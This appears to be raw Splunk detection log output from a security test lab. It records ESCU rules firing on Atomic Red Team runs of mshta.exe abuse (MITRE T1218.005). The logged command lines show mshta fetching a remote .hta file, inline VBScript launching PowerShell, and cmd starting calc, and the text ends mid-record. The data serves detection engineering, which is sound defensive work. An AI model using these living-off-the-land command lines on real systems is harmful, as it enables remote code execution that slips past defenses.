lastTime="2022-07-13T18:31:52", original_file_name="unknown", parent_process="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", parent_process_name="WmiPrvSE.exe", process="\"C:\\Windows\\system32\\mshta.exe\" \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta\"", process_name="mshta.exe", risk_message="An instance of WmiPrvSE.exe spawning mshta.exe was identified on endpoint $est$ by user Administrator attempting to access a remote destination to download an additional payload.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"rundll32.exe\" and its parent process.", threat_object="WmiPrvSE.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657739733, search_name="ESCU - Detect MSHTA Url in Command Line - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:52", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:52", original_file_name="unknown", parent_process="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", parent_process_name="WmiPrvSE.exe", process="\"C:\\Windows\\system32\\mshta.exe\" \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta\"", process_name="mshta.exe", risk_message="An instance of WmiPrvSE.exe spawning mshta.exe was identified on endpoint $est$ by user Administrator attempting to access a remote destination to download an additional payload.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"rundll32.exe\" and its parent process.", threat_object="WmiPrvSE.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657739733, search_name="ESCU - Detect MSHTA Url in Command Line - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:52", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:52", original_file_name="MSHTA.EXE", parent_process="C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", parent_process_name="WmiPrvSE.exe", process="\"C:\\Windows\\system32\\mshta.exe\" \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta\"", process_name="mshta.exe", risk_message="An instance of WmiPrvSE.exe spawning mshta.exe was identified on endpoint $est$ by user Administrator attempting to access a remote destination to download an additional payload.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"rundll32.exe\" and its parent process.", threat_object="WmiPrvSE.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657739733, search_name="ESCU - Detect MSHTA Url in Command Line - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:52", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:52", original_file_name="MSHTA.EXE", parent_process="C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", parent_process_name="WmiPrvSE.exe", process="\"C:\\Windows\\system32\\mshta.exe\" \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta\"", process_name="mshta.exe", risk_message="An instance of WmiPrvSE.exe spawning mshta.exe was identified on endpoint $est$ by user Administrator attempting to access a remote destination to download an additional payload.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"rundll32.exe\" and its parent process.", threat_object="WmiPrvSE.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="7", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:41", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", parent_process="unknown", process="unknown", process_name="cmd.exe", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="unknown", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="7", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:41", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", parent_process="unknown", process="unknown", process_name="cmd.exe", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="unknown", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:32:03", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", parent_process="mshta.exe  \"about:&lt;hta:application&gt;&lt;script language=\"VBScript\"&gt;Close(Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run%20\"\"powershell.exe%20-nop%20-Command%20Write-Host%20Hello,%20MSHTA!;Start-Sleep%20-Seconds%205\"\"\"))&lt;/script&gt;'\"", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host Hello, MSHTA!;Start-Sleep -Seconds 5", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="mshta.exe  \"about:&lt;hta:application&gt;&lt;script language=\"VBScript\"&gt;Close(Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run%20\"\"powershell.exe%20-nop%20-Command%20Write-Host%20Hello,%20MSHTA!;Start-Sleep%20-Seconds%205\"\"\"))&lt;/script&gt;'\"", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:32:03", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", parent_process="mshta.exe  \"about:&lt;hta:application&gt;&lt;script language=\"VBScript\"&gt;Close(Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run%20\"\"powershell.exe%20-nop%20-Command%20Write-Host%20Hello,%20MSHTA!;Start-Sleep%20-Seconds%205\"\"\"))&lt;/script&gt;'\"", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host Hello, MSHTA!;Start-Sleep -Seconds 5", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="mshta.exe  \"about:&lt;hta:application&gt;&lt;script language=\"VBScript\"&gt;Close(Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run%20\"\"powershell.exe%20-nop%20-Command%20Write-Host%20Hello,%20MSHTA!;Start-Sleep%20-Seconds%205\"\"\"))&lt;/script&gt;'\"", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:41", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:41", parent_process="mshta  vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1\"\":close\")", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="mshta  vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1\"\":close\")", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:41", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:41", parent_process="mshta  vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1\"\":close\")", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="mshta  vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1\"\":close\")", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:44", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:44", parent_process="C:\\Windows\\System32\\mshta.exe -Embedding", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host b48332f0-8928-4136-9bfa-f28152292573; Start-Sleep -Seconds 2; exit", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="C:\\Windows\\System32\\mshta.exe -Embedding", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:44", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:44", parent_process="C:\\Windows\\System32\\mshta.exe -Embedding", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host b48332f0-8928-4136-9bfa-f28152292573; Start-Sleep -Seconds 2; exit", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="C:\\Windows\\System32\\mshta.exe -Embedding", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="6", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:41", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", parent_process="C:\\Windows\\System32\\mshta.exe", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host 23aa97c3-2d1e-46ec-a7aa-b62426241201; Start-Sleep -Seconds 2; exit", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host Hello, MSHTA!;Start-Sleep -Seconds 5", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host b48332f0-8928-4136-9bfa-f28152292573; Start-Sleep -Seconds 2; exit", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host d3515e72-d751-42bd-854d-643ea9968afe; Start-Sleep -Seconds 2; exit", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_name="cmd.exe", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="C:\\Windows\\System32\\mshta.exe", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="6", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:41", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", parent_process="C:\\Windows\\System32\\mshta.exe", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host 23aa97c3-2d1e-46ec-a7aa-b62426241201; Start-Sleep -Seconds 2; exit", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host Hello, MSHTA!;Start-Sleep -Seconds 5", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host b48332f0-8928-4136-9bfa-f28152292573; Start-Sleep -Seconds 2; exit", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host d3515e72-d751-42bd-854d-643ea9968afe; Start-Sleep -Seconds 2; exit", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_name="cmd.exe", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="Administrator", 